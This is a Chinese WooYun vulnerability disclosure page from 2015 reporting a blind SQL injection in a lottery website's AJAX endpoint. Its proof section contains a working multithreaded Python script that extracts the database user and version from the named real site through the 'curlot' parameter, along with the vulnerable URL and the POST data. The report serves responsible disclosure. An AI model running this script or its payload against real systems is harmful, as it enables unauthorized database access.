当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110891

漏洞标题:乐彩网一处MariaDB注入

相关厂商:乐彩网

漏洞作者: loopx9

提交时间:2015-05-04 15:53

修复时间:2015-06-18 17:14

公开时间:2015-06-18 17:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-04: 细节已通知厂商并且等待厂商处理中
2015-05-04: 厂商已经确认,细节仅向厂商公开
2015-05-14: 细节向核心白帽子及相关领域专家公开
2015-05-24: 细节向普通白帽子公开
2015-06-03: 细节向实习白帽子公开
2015-06-18: 细节向公众公开

简要描述:

MariaDB盲注,root账户.

详细说明:

http://www.17500.cn/tools/qushiajax.php
post data: nourl=true&lotid=fc3d&curlot=2015091&qi=20

参数curlot存在注入:

17500.png

漏洞证明:

验证脚本

#coding=utf-8
import sys,urllib2
import threading
from multiprocessing.dummy import Pool
from multiprocessing.dummy import Lock
from optparse import OptionParser
from urllib2 import Request,urlopen,URLError,HTTPError
import urllib
def request(URL, data):
user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
req = urllib2.Request(URL, None, user_agent)

try:
request = urllib2.urlopen(req, data)

except HTTPError, e:
if e.code == 500:
return 'Runtime Error'

except URLError, e:
print('[!] We failed to reach a server.')
print('[!] Reason: ' + str(e.reason))
sys.exit(1)

return request.read()
def binary_sqli(left, right, index):
global result
while 1:
mid = (left + right)/2
if mid == left:
lock.acquire()
result[index-1]= chr(mid)
sys.stdout.write('\r%s' % 'concat(user(),0x3a,@@version): '+''.join(result))
sys.stdout.flush()
lock.release()
break
payload = "2015091 and 1=if(ascii(substring(concat(user(),0x3a,@@version),%s,1))<%s,1,2)" % (index, mid)
param = {'nourl':'true', 'lotid':'fc3d', 'qi':'1', 'curlot': payload}
html = request('http://www.17500.cn/tools/qushiajax.php', urllib.urlencode(param))
verify = '2015-04-07'
if verify in html:
right = mid
else:
left = mid
def multi_run_wrapper(args):
return binary_sqli(*args)

if __name__ == '__main__':
result=list('*'*50)
lock=Lock()
args = []
for i in range(1,50):
args.append((32, 127, i))
pool = Pool(10)
out = pool.map(multi_run_wrapper, args)
pool.close()
pool.join()


1.png

修复方案:

过滤.

版权声明:转载请注明来源 loopx9@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2015-05-04 17:13

厂商回复:

谢谢提供漏洞信息,我们尽快修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-04 16:17 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    这个是mysql?

  2. 2015-05-04 16:37 | loopx9 ( 核心白帽子 | Rank:602 漏洞数:62 | ..)

    MySQL分支